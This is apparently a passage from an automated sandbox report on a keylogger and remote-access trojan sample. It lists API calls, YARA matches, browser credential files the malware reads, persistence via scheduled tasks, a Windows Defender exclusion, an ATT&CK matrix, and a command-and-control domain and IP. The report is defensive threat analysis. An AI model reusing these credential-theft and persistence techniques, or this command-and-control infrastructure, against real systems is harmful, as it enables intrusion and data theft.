            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004329DA cpuid 13_2_004329DA
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: EnumSystemLocalesW,13_2_0044F17B
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: EnumSystemLocalesW,13_2_0044F130
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: EnumSystemLocalesW,13_2_0044F216
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_0044F2A3
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: GetLocaleInfoA,13_2_0040E2BB
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: GetLocaleInfoW,13_2_0044F4F3
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_0044F61C
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: GetLocaleInfoW,13_2_0044F723
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_0044F7F0
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: EnumSystemLocalesW,13_2_00445914
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: GetLocaleInfoW,13_2_00445E1C
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,13_2_0044EEB8
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeQueries volume information: C:\Users\user\Desktop\Nfi2yQDBda.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeQueries volume information: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040A0B0 GetLocalTime,wsprintfW,13_2_0040A0B0
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004195F8 GetUserNameW,13_2_004195F8
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,13_2_004466BF
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 13.2.xjXWSRbLn.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.42e5e38.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.xjXWSRbLn.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.42e5e38.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.4458e78.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.4458e78.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.439f658.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3807944178.000000000119A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1402490811.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1365608505.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1365608505.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nfi2yQDBda.exe PID: 7288, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Nfi2yQDBda.exe PID: 7624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xjXWSRbLn.exe PID: 7960, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data13_2_0040A953
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\13_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: \key3.db13_2_0040AA71

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 13.2.xjXWSRbLn.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.42e5e38.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.xjXWSRbLn.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.42e5e38.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.4458e78.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.4458e78.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.439f658.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3807944178.000000000119A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1402490811.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1365608505.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1365608505.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nfi2yQDBda.exe PID: 7288, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Nfi2yQDBda.exe PID: 7624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xjXWSRbLn.exe PID: 7960, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: cmd.exe13_2_0040567A
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services11
            Archive Collected Data
            11
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter
            1
            Windows Service
            1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            111
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol111
            Input Capture
            2
            Encrypted Channel
            Exfiltration Over Bluetooth1
            Defacement
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            1
            Scheduled Task/Job
            1
            Windows Service
            3
            Obfuscated Files or Information
            2
            Credentials In Files
            1
            System Service Discovery
            SMB/Windows Admin Shares3
            Clipboard Data
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            Service Execution
            Login Hook121
            Process Injection
            2
            Software Packing
            NTDS3
            File and Directory Discovery
            Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Scheduled Task/Job
            1
            Timestomp
            LSA Secrets33
            System Information Discovery
            SSHKeylogging11
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials121
            Security Software Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Masquerading
            DCSync31
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion
            Proc Filesystem2
            Process Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation
            /etc/passwd and /etc/shadow1
            Application Window Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron121
            Process Injection
            Network Sniffing1
            System Owner/User Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588666 Sample: Nfi2yQDBda.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 44 decmainserver.webredirect.org 2->44 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 9 other signatures 2->54 8 xjXWSRbLn.exe 5 2->8         started        11 Nfi2yQDBda.exe 7 2->11         started        signatures3 process4 file5 58 Multi AV Scanner detection for dropped file 8->58 60 Contains functionalty to change the wallpaper 8->60 62 Machine Learning detection for dropped file 8->62 70 4 other signatures 8->70 14 schtasks.exe 1 8->14         started        16 xjXWSRbLn.exe 8->16         started        18 xjXWSRbLn.exe 8->18         started        36 C:\Users\user\AppData\Roaming\xjXWSRbLn.exe, PE32 11->36 dropped 38 C:\Users\...\xjXWSRbLn.exe:Zone.Identifier, ASCII 11->38 dropped 40 C:\Users\user\AppData\Local\...\tmpB4A4.tmp, XML 11->40 dropped 42 C:\Users\user\AppData\...42fi2yQDBda.exe.log, ASCII 11->42 dropped 64 Uses schtasks.exe or at.exe to add and modify task schedules 11->64 66 Adds a directory exclusion to Windows Defender 11->66 68 Injects a PE file into a foreign processes 11->68 20 powershell.exe 23 11->20         started        23 Nfi2yQDBda.exe 2 11->23         started        26 schtasks.exe 1 11->26         started        signatures6 process7 dnsIp8 28 conhost.exe 14->28         started        56 Loading BitLocker PowerShell Module 20->56 30 WmiPrvSE.exe 20->30         started        32 conhost.exe 20->32         started        46 decmainserver.webredirect.org 69.174.98.48, 45682, 49702, 49836 ASN-QUADRANET-GLOBALUS United States 23->46 34 conhost.exe 26->34         started        signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Nfi2yQDBda.exe82%VirustotalBrowse
            Nfi2yQDBda.exe68%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger
            Nfi2yQDBda.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\xjXWSRbLn.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\xjXWSRbLn.exe68%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            decmainserver.webredirect.org0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            decmainserver.webredirect.org
            69.174.98.48
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              decmainserver.webredirect.orgtrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://geoplugin.net/json.gpxjXWSRbLn.exefalse
                high
                http://geoplugin.net/json.gp/CNfi2yQDBda.exe, 00000000.00000002.1365608505.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Nfi2yQDBda.exe, 00000000.00000002.1365608505.0000000004357000.00000004.00000800.00020000.00000000.sdmp, xjXWSRbLn.exe, 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNfi2yQDBda.exe, 00000000.00000002.1364332294.0000000003303000.00000004.00000800.00020000.00000000.sdmp, xjXWSRbLn.exe, 00000008.00000002.1405900840.0000000002E91000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    69.174.98.48
                    decmainserver.webredirect.orgUnited States
                    8100ASN-QUADRANET-GLOBALUStrue
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1588666
                    Start date and time:2025-01-11 03:53:44 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 26s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:19
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Nfi2yQDBda.exe
                    renamed because original name is a hash value
                    Original Sample Name:f9b5a6befe0272cfa6fe717ac29a61d76bd340d1c564e179cb65975ac98b1f07.exe
                    Detection:MAL
                    Classification:mal100.rans.troj.spyw.evad.winEXE@18/11@2/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 120
                    • Number of non-executed functions: 193
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 20.12.23.50
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    03:54:49Task SchedulerRun new task: xjXWSRbLn path: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe
                    21:54:47API Interceptor4366383x Sleep call for process: Nfi2yQDBda.exe modified
                    21:54:49API Interceptor18x Sleep call for process: powershell.exe modified
                    21:54:52API Interceptor1x Sleep call for process: xjXWSRbLn.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    69.174.98.48rO37Xq39IF.exeGet hashmaliciousRemcosBrowse
                      vQyKfYxzXB.exeGet hashmaliciousRemcosBrowse
                        Ref#60031796.exeGet hashmaliciousRemcosBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          decmainserver.webredirect.orgrO37Xq39IF.exeGet hashmaliciousRemcosBrowse
                          • 69.174.98.48
                          vQyKfYxzXB.exeGet hashmaliciousRemcosBrowse
                          • 69.174.98.48
                          Ref#60031796.exeGet hashmaliciousRemcosBrowse
                          • 69.174.98.48
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          ASN-QUADRANET-GLOBALUSrO37Xq39IF.exeGet hashmaliciousRemcosBrowse
                          • 69.174.98.48
                          frosty.sh4.elfGet hashmaliciousMiraiBrowse
                          • 45.199.228.228
                          xLDz0WPZYc.exeGet hashmaliciousGuLoaderBrowse
                          • 66.63.187.30
                          xLDz0WPZYc.exeGet hashmaliciousGuLoaderBrowse
                          • 66.63.187.30
                          vQyKfYxzXB.exeGet hashmaliciousRemcosBrowse
                          • 69.174.98.48
                          https://zfrmz.com/3GiGYUP4BArW2NBgkPU3Get hashmaliciousUnknownBrowse
                          • 45.61.152.125
                          gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                          • 66.63.187.173
                          armv5l.elfGet hashmaliciousUnknownBrowse
                          • 104.237.80.14
                          30% Order payment-BLQuote_'PO#385995790.exeGet hashmaliciousAsyncRATBrowse
                          • 69.174.100.131
                          drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                          • 66.63.187.173
                          No context
                          No context
                          Process:C:\Users\user\Desktop\Nfi2yQDBda.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:true
                          Reputation:high, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                          Process:C:\Users\user\AppData\Roaming\xjXWSRbLn.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
